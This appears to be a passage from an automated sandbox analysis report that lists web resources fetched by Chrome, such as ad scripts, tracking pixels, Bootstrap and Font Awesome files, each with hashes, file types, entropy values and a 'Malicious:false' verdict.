                                                                                                                                                                                                                                                                                                                      SHA1:A4C8DC02751F5809723DEAFD166969D2D5BACF27
                                                                                                                                                                                                                                                                                                                      SHA-256:4EAE7C63CE735CEC03881270269471E56E709D5DA4951CB46AEA9AF1FC615099
                                                                                                                                                                                                                                                                                                                      SHA-512:213259C958F1E4679D933370D369FC8C5C6F09C160F62027EA441F8DABE5676186EE3EA52570C3607F2E9719A1BCF9F7A4CA9356C107924BC5E5A5DC0E64D4A1
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",p={},fa={};function r(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function t(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var d=e[0],f;!a&&d in p?f=p:f=da;for(d=0;d<e.length-1;d++){var h=e[d];if(!(h in f))break a;f=f[h]}e=e[e.length-1];c=ea&&c==="es6"?f[e]:null;b=b(c);b!=null&&(a?ba(p,e,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[e]==
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ&google_hm=22210ca7ce1ae6f72pgi3e00m2xmr4i6
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2200)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):23701
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.499820432715541
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:PqTcq08AdYSAwhImk7eDivZSPoa5LjcOuq37BroWaIOXXhwpuy4yDCWyj/1gVfj5:Pqr0VdYSAX7ecMPoaNQOHdUWaIOX277t
                                                                                                                                                                                                                                                                                                                      MD5:8E928C4BDDE1C53A613B419348556184
                                                                                                                                                                                                                                                                                                                      SHA1:B08CB2310F2B4BC7EC489014E2F041A1AD7A5FBB
                                                                                                                                                                                                                                                                                                                      SHA-256:D83AFDD078C43825E5173918368CE83C62082C7D10408D0B2D788B5B60CF0E2A
                                                                                                                                                                                                                                                                                                                      SHA-512:49EA93EF9F60712DAC6610CCFDF19E48911266767F732F8B5A615326D29346B5C9E19B040E7CBBEB38A5A08DFDB76EEC86A4108C553BABD9E909245E851D619B
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/abg_lite_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData||null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")||t("CriOS"))&&!(u()?0:t("Edge"))||t("Silk")};function ka(a){ka[" "](a);return a}ka[" "]=function(){};!t("Android")||ja();ja();t("Safari")&&(ja()||(u()?0:t("Coast"))||(u()?0:t("Opera"))||(u()?0:t("Edge"))||(u()?ia("Microsoft Edge"):t("Edg/"))||u()&&ia("Opera"));let la;function ma(){const a=Error();a.__closure__error__context__98438
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65299)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):78743
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.178440533196338
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:tp+1ZTPR2t4tXbih05ve8/pwgrEpc9t0vSAIAxCs:MFRIpk0vSAV
                                                                                                                                                                                                                                                                                                                      MD5:0AA8D64E726C4A57ADB5C88F9115996B
                                                                                                                                                                                                                                                                                                                      SHA1:901169527507FF9E662CF64D8E361F359308970D
                                                                                                                                                                                                                                                                                                                      SHA-256:7E1F1503DF765CCA5E099891B94E318A2EF95081BA2AF1EB6D417CC884BFDBFE
                                                                                                                                                                                                                                                                                                                      SHA-512:EF6583F7684BB3B4F91405E7DEF90D65F9561BAA609540C3A66F3B4DE4267D283C2A7AF298BD86DF447B6ACE05993C2182EF47EDE4B30C25F79A38AD49E70A9F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t={find:(t,e=document.documentElement)=>[].concat(...Element.prototype.querySelectorAll.call(e,t)),findOne:(t,e=document.documentElement)=>Element.prototype.querySelector.call(e,t),children:(t,e)=>[].concat(...t.children).filter(t=>t.matches(e)),parents(t,e){const i=[];let n=t.parentNode;for(;n&&n.nodeType===Node.ELEMENT_NODE&&3!==n.nodeType;)n.matches(e)&&i.push(n),n=n.parentNode;return i},prev(t,e){let i=t.previousElementSibling;for(;i;){if(i.matches(e))return[i];i=i.previousElementSibling}return[]},next(t,e){let i=
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 157192, version 774.256
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):157192
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996404310886749
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:AeqpbFGFxHY0qqD6sTqOmtIw+eW7vMNhGRWcUJfiCE:A1ZUFJYsZOOmtIw+t7ShGRWDc
                                                                                                                                                                                                                                                                                                                      MD5:76CF3FF0DBD23DD4504E2089F0DF4ACB
                                                                                                                                                                                                                                                                                                                      SHA1:BD2958CF51CC0A7B5C11A0B5C84101F35C2799A0
                                                                                                                                                                                                                                                                                                                      SHA-256:340E6D7F301471E307E50C2ED43FE45DEBC8EBBF24FEBEF17B24F0B06F8883F2
                                                                                                                                                                                                                                                                                                                      SHA-512:C957943B64F990E24838268E3F1A6E6B4A583AEAC6B83588FC01D269A096A888FA4DC2E16E96D23C3A84D7EB0F498C5FBA55AACD966D0DCE7C5A50449431A49A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ka-f.fontawesome.com/releases/v6.6.0/webfonts/free-fa-solid-900.woff2
                                                                                                                                                                                                                                                                                                                      Preview:wOF2......f.......)...e..........................6.$. .`..P...f.. .T..m. %.....L......y.....SA.....PUUUU5)!.1.v...*..O~.._..w..._..............S`0...0-.q.=^.....~..L.^R.[..'..P..Be.)..W.U....*...4......(..f.;....".z.h..ej..0....R:.,X.',.Usz.\.m..l}.Q..'t...{N.......r...VH...Nr..M.F."..n...?oF0".!.y1.$..D...n..~.g.d;$.c|........d!VS......O..M%......G<!.. ........D..C.pQ.....T2.y......Gz.Gi.........U@...@.".._..f...'+..=..[u.VH.......fr..t....6.j.R..J..PF.J.....8H..14`...~K...&...oml....g..{.m.?`L........s...iR.iT.Y.*.....n8.......B...N.,.$.(.W ..wZ!QHk~.F..N^#.i."U..................@J..u.lZ.Ul.f\.8E.%.-pIi..u.u.5..~].k.w.K..z.A?O...~i3..Z.jwV.%.h.#..6...c.i.\ .F.9.(.RMZ5i.i]....}.;.......~.}G....V.N.S..y..xF.. ...^....7%4.MuZS..`..`.. .. . ...x.?..A.A..l..%+....~^.=...1....f$v.u.h+.....iO.i.[.q.(lW....C.G.)...{....r!.o.....j...h..w....7O g.....=#z..%..n...]p.l4.+.z5...B.......~..!.)..%==......U.oS.y49;.$.,.)v!.S..$.........{."....jJ.....i...D......j{.j.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65306)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):155845
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0596333050371385
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:d0bwW83RipVVsEBpy0cuJcf22RWb5CyVUpz600I4fM:d0bwlyVUpz600I4fM
                                                                                                                                                                                                                                                                                                                      MD5:ABE91756D18B7CD60871A2F47C1E8192
                                                                                                                                                                                                                                                                                                                      SHA1:7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
                                                                                                                                                                                                                                                                                                                      SHA-256:7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
                                                                                                                                                                                                                                                                                                                      SHA-512:BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css
                                                                                                                                                                                                                                                                                                                      Preview:@charset "UTF-8";/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):3523
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.555351955838022
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:lhntIzmwye2BpZ2MwU2DYCavSes39bnxk3jSOuw36ie/a+wDAO9+3Nri:3ntIznSZzF7rsxkx8a9+3N2
                                                                                                                                                                                                                                                                                                                      MD5:69CD9682541959C91A58CB55C6FD44BA
                                                                                                                                                                                                                                                                                                                      SHA1:DC6E1C1621F0B884BA4D044EC8ED2E6757C64333
                                                                                                                                                                                                                                                                                                                      SHA-256:08F9FE85092CDCC7A7FC6435459A31A6F4FC844B27C5CC942B273202C7D7B1C2
                                                                                                                                                                                                                                                                                                                      SHA-512:BD87ADB1DA8BD563E9870526A262FCE6CC4BB285513F6561318519B9ECD16B4DA5CD0EC65BC8E0527141CC6427BC03C97926C97A0704F744E57C9A819B14148B
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.....................tEXtSoftware.www.inkscape.org..<.....pHYs............I....PLTEGpL...................................................3.................................................................................................................................................................................................................................................................#......Ua...3......kz............3......`n3...LV...2......#(.............."..1...GR.m}.(.'.. ..!...hw,..............OZ.'-.u..ws.ds....292..0....5\OM1..%..-..QFDA86.........G=; ../..5.,.8@80//..&........;C0..%...Yf.AJ.Q\.s.. $...-'&...j[Y........(...?H.q.qa^..{....}.."'.Xe....z....)..gYV&..!...FP....07....yu.ur...&...o.......$..zif(......w.......#....-...4<......(#!.qmsc`/)'...l]Z....}y.....,....,........MB@!..eWT.[hI?=.CM*..so2..~......zv0)(.].4...ktRNS...2..........l.;.A..........6q..7...'"..x...\....C....$.^u..K.)a.......nQ.f{4sT.=~....+cE.VNg.XB...6`......IDATx.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):3523
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.555351955838022
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:lhntIzmwye2BpZ2MwU2DYCavSes39bnxk3jSOuw36ie/a+wDAO9+3Nri:3ntIznSZzF7rsxkx8a9+3N2
                                                                                                                                                                                                                                                                                                                      MD5:69CD9682541959C91A58CB55C6FD44BA
                                                                                                                                                                                                                                                                                                                      SHA1:DC6E1C1621F0B884BA4D044EC8ED2E6757C64333
                                                                                                                                                                                                                                                                                                                      SHA-256:08F9FE85092CDCC7A7FC6435459A31A6F4FC844B27C5CC942B273202C7D7B1C2
                                                                                                                                                                                                                                                                                                                      SHA-512:BD87ADB1DA8BD563E9870526A262FCE6CC4BB285513F6561318519B9ECD16B4DA5CD0EC65BC8E0527141CC6427BC03C97926C97A0704F744E57C9A819B14148B
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/resources/img/error.png
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.....................tEXtSoftware.www.inkscape.org..<.....pHYs............I....PLTEGpL...................................................3.................................................................................................................................................................................................................................................................#......Ua...3......kz............3......`n3...LV...2......#(.............."..1...GR.m}.(.'.. ..!...hw,..............OZ.'-.u..ws.ds....292..0....5\OM1..%..-..QFDA86.........G=; ../..5.,.8@80//..&........;C0..%...Yf.AJ.Q\.s.. $...-'&...j[Y........(...?H.q.qa^..{....}.."'.Xe....z....)..gYV&..!...FP....07....yu.ur...&...o.......$..zif(......w.......#....-...4<......(#!.qmsc`/)'...l]Z....}y.....,....,........MB@!..eWT.[hI?=.CM*..so2..~......zv0)(.].4...ktRNS...2..........l.;.A..........6q..7...'"..x...\....C....$.^u..K.)a.......nQ.f{4sT.=~....+cE.VNg.XB...6`......IDATx.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=ta&google_hm=Fyu-5GbPRWQ6ZIpuIUpEuw&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65321)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):96614
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.750153610655337
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                                                                                                                                                                                                      MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                                                                                                                                                                                                      SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                                                                                                                                                                                                      SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                                                                                                                                                                                                      SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free.min.css?token=8ce76d2187
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                      MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                      SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                      SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                      SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://td.doubleclick.net/td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281
                                                                                                                                                                                                                                                                                                                      Preview:<html></html>
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2016)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):39635
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519642162172215
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:qzYb3uSHMeNfX5m6cx/qbk/Bssq+2ZSgxIs9bWHGJ4CricXgTpg/4G0yl6qQHm5L:RDlO/qY/B82c8OACsvEF
                                                                                                                                                                                                                                                                                                                      MD5:CC42289087B3F73300F3C5E415B64EC5
                                                                                                                                                                                                                                                                                                                      SHA1:6601C16428E3F155F0F2A43A8BF8773A0E2F9C60
                                                                                                                                                                                                                                                                                                                      SHA-256:9713067914ACF51B1A42776C63F42801C2145580D8923848BDE24581C9157DC0
                                                                                                                                                                                                                                                                                                                      SHA-512:A2FD8E9024A0DCB41FC31C7F2B1CCE7ED7E320EA585F39DF963758B904A6472600C0BE12B814AD879E202632329DB49B391B61B4466A1E49A1E6415387F5C520
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
